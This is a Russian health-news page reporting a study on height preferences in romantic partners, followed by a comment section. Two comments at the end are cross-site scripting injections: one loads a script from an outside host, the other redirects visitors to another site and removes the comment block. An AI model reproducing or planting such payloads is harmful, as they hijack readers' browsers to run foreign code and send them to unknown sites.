Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Размер все-таки имеет зна...  >>  Размер все-таки имеет значение! Сколько нужно сантиметров?
 
Обратная связь
 

Размер все-таки имеет значение! Сколько нужно сантиметров?

Размер шрифта
04 августа 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Так ли важен размер в делах сердечных? Если речь идет о росте, то ответ несомненно «да». Согласно новому исследованию из Университета Райса и Университета Северного Техаса, рост потенциального партнера важен в большей степени для женщин, чем для мужчин, в первую очередь для их женственности и из-за потребности в защите.

Размер все-таки имеет значение! Сколько нужно сантиметров?

Исследование под названием «А рост имеет значение? Анализ предпочтений в романтических отношениях» было разделено на две части. В первой были проанализированы данные персональных анкет из раздела знакомств сайта «Yahoo!» касательно 455 мужчин (средний рост – 173 см, средний возраст – 36 лет) и 470 женщин (соответственно, 163 см и 35 лет). Было обнаружено, что 13,5 % мужчин хотели бы встречаться только с женщинами ниже их ростом. В противоположность этому, около половины всех женщин – 48,9% – хотели встречаться только с мужчинами выше себя.

«Эволюционная психология утверждает, что схожесть имеет наибольшее значение в развитии любовных отношений между людьми», – рассказывает Майкл Эмерсон, профессор социологии, один из директоров Института урбанистических исследований Райса и соавтор работы. «Однако наше исследование предполагает, что для физических признаков, таких как рост, сходство – не главное правило, особенно для женщин».

Во вторую часть эксперимента были включены 54 мужчины (средний рост составил 176 см) и 131 женщина (средний рост 163 см). Это были добровольцы из одного из университетов США. Они отвечали на вопросы онлайн. Результаты оказались аналогичны таковым из первой части работы: 37% мужчин хотели встречаться с женщинами ниже их ростом, в то время как 55% женщин – только с мужчинами выше себя.

Согласно полученным данным, главными причинами выбора женщинами партнера выше себя ростом послужили потребность в защите и чувство женственности.

«Как девушка, я бы хотела чувствовать себя хрупкой и нежной и в то же время в безопасности», – говорит одна из участниц эксперимента, рост которой 160 см. «Это просто кажется мне очень и очень странным – смотреть вниз, глядя в глаза своему кавалеру. Также нельзя забывать и о возможности носить туфли на высоком каблуке и все еще оставаться ниже него. И еще хотелось бы обнимать моего мужчину, поднимая к нему руки и обхватывая его шею».

Мужчины гораздо реже заявляли, что рост для них важен, а те, кто говорил об этом, предпочитали женщин ниже себя, однако не настолько низких, чтобы это могло мешать интимной близости.

«Мне нравится, когда тело партнера подходит к моему собственному», – отмечает другой участник исследования, мужчина ростом 180 см. «Так гораздо легче целоваться, держаться за руки и делать многое другое вместе». Джордж Янси, профессор социологии из Университета Северного Техаса и ведущий автор исследования, считает, что предпочтения мужчин и женщин в росте могут быть легко объяснены с точки зрения социологии и гендерных стереотипов. Он упоминает широко распространенное общественное мнение, что высокий рост – это преимущество для мужчины и скорее недостаток для женщины. Результаты его работы показывают, что важность роста для женщин подтверждает патриархальную систему, в которой мужчина – главный авторитет.

«Возможность мужчины давать женщине ощущение безопасности прямо отражает концепцию мужчины-защитника, – добавляет он. – Образ высокого мужчины рядом с женщиной ниже его очень подходит для современного общества, в котором патриархат по-прежнему удерживает свои позиции».

Имеет ли значение рост при выборе пары – каждый решает сам. Однако не стоит забывать, что главное в итоге – гармоничные отношения, которые приносят радость обоим.

Другие статьи о женском здоровье и не только читайте на страницах нашего соответствующего спецпроекта.
 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:31

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Одинокие люди просадят ваши деньги!   Памятка – антинасилие. Что делать, если вас хотят изнасиловать?   Селфи убивает больше людей, чем акулы!   Почему россияне едут лечиться за рубеж  
22 июля 2013Хотите заболеть шизофренией – попробуйте свинец! Свинец вызывает шизофрению 19 июля 2013У вашего мужа в 3 раза больше шансов совершить самоубийство! А какой шанс у вас?
 
12 июля 2013Как мы мжоем чтиать слвоа, кодга все бвукы перпуетнаы? 01 ноября 2013ИНВИТРО – «Марка №1» в России
 

Слайдшоу

1
Странные сигналы вашего организма
Что надо делать в душе
Грусть или смертельная болезнь

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.